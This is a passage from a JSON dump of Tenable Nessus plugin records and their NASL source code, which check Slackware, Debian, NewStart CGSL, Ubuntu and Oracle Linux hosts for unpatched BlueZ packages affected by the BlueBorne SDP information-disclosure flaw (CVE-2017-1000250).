arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"i486\", pkgnum:\"4_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"x86_64\", pkgnum:\"4_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:slackware_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:50:41", "description": "An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker\nto obtain sensitive information from bluetoothd process memory,\nincluding Bluetooth encryption keys.", "edition": 28, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-14T00:00:00", "title": "Debian DSA-3972-1 : bluez - security update (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bluez", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-3972.NASL", "href": "https://www.tenable.com/plugins/nessus/103198", "sourceData": "#%NASL_MIN_LEVEL 
70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3972. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103198);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"DSA\", value:\"3972\");\n\n script_name(english:\"Debian DSA-3972-1 : bluez - security update (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker\nto obtain sensitive information from bluetoothd process memory,\nincluding Bluetooth encryption keys.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=875633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bluez\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/bluez\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3972\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bluez packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"bluetooth\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-cups\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-dbg\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-hcidump\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bluez-obexd\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 
prefix:\"bluez-test-scripts\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth-dev\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth3\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbluetooth3-dbg\", reference:\"5.23-2+deb8u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluetooth\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-cups\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-dbg\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-hcidump\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-obexd\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-test-scripts\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"bluez-test-tools\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth-dev\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth3\", reference:\"5.43-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libbluetooth3-dbg\", reference:\"5.43-2+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:03:21", "description": "The remote NewStart CGSL host, running version MAIN 4.05, has bluez packages installed that are affected by a\nvulnerability:\n\n - An information-disclosure flaw was found in the\n bluetoothd implementation of the Service Discovery\n Protocol (SDP). 
A specially crafted Bluetooth device\n could, without prior pairing or user interaction,\n retrieve portions of the bluetoothd process memory,\n including potentially sensitive information such as\n Bluetooth encryption keys. (CVE-2017-1000250)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-08-12T00:00:00", "title": "NewStart CGSL MAIN 4.05 : bluez Vulnerability (NS-SA-2019-0117)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2019-08-12T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0117_BLUEZ.NASL", "href": "https://www.tenable.com/plugins/nessus/127358", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0117. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127358);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000250\");\n\n script_name(english:\"NewStart CGSL MAIN 4.05 : bluez Vulnerability (NS-SA-2019-0117)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 4.05, has bluez packages installed that are affected by a\nvulnerability:\n\n - An information-disclosure flaw was found in the\n bluetoothd implementation of the Service Discovery\n Protocol (SDP). 
A specially crafted Bluetooth device\n could, without prior pairing or user interaction,\n retrieve portions of the bluetoothd process memory,\n including potentially sensitive information such as\n Bluetooth encryption keys. (CVE-2017-1000250)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0117\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bluez packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000250\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL MAIN 4.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 4.05');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL MAIN 4.05\": [\n \"bluez-4.66-2.el6_9\",\n \"bluez-libs-4.66-2.el6_9\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-01T07:23:36", "description": "It was discovered that an information disclosure vulnerability existed\nin the Service Discovery Protocol (SDP) implementation in BlueZ. A\nphysically proximate unauthenticated attacker could use this to\ndisclose sensitive information. (CVE-2017-1000250).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-13T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : bluez vulnerability (USN-3413-1) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bluez", "cpe:/o:canonical:ubuntu_linux:17.04", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:libbluetooth3", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3413-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103187", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3413-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103187);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"USN\", value:\"3413-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : bluez vulnerability (USN-3413-1) (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that an information disclosure vulnerability existed\nin the Service Discovery Protocol (SDP) implementation in BlueZ. A\nphysically proximate unauthenticated attacker could use this to\ndisclose sensitive information. 
(CVE-2017-1000250).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3413-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez and / or libbluetooth3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice 
(C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bluez\", pkgver:\"4.101-0ubuntu13.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libbluetooth3\", pkgver:\"4.101-0ubuntu13.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"bluez\", pkgver:\"5.37-0ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libbluetooth3\", pkgver:\"5.37-0ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"bluez\", pkgver:\"5.43-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libbluetooth3\", pkgver:\"5.43-0ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / libbluetooth3\");\n}\n", "cvss": {"score": 3.3, 
"vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:51:45", "description": "From Red Hat Security Advisory 2017:2685 :\n\nAn update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. 
(CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "edition": 28, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-13T00:00:00", "title": "Oracle Linux 6 / 7 : bluez (ELSA-2017-2685) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-13T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bluez-libs", "p-cpe:/a:oracle:linux:bluez-compat", "cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:bluez-gstreamer", "p-cpe:/a:oracle:linux:bluez-hid2hci", "p-cpe:/a:oracle:linux:bluez", "p-cpe:/a:oracle:linux:bluez-cups", "p-cpe:/a:oracle:linux:bluez-libs-devel", "p-cpe:/a:oracle:linux:bluez-alsa", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2017-2685.NASL", "href": "https://www.tenable.com/plugins/nessus/103166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2685 and \n# Oracle Linux Security Advisory ELSA-2017-2685 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103166);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"RHSA\", value:\"2017:2685\");\n\n script_name(english:\"Oracle Linux 6 / 7 : bluez (ELSA-2017-2685) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2685 :\n\nAn update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this 
update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-September/007202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-September/007204.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-alsa\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-hid2hci\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bluez-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-alsa-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-compat-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-cups-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-gstreamer-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-libs-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-libs-devel-4.66-2.el6_9\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", 
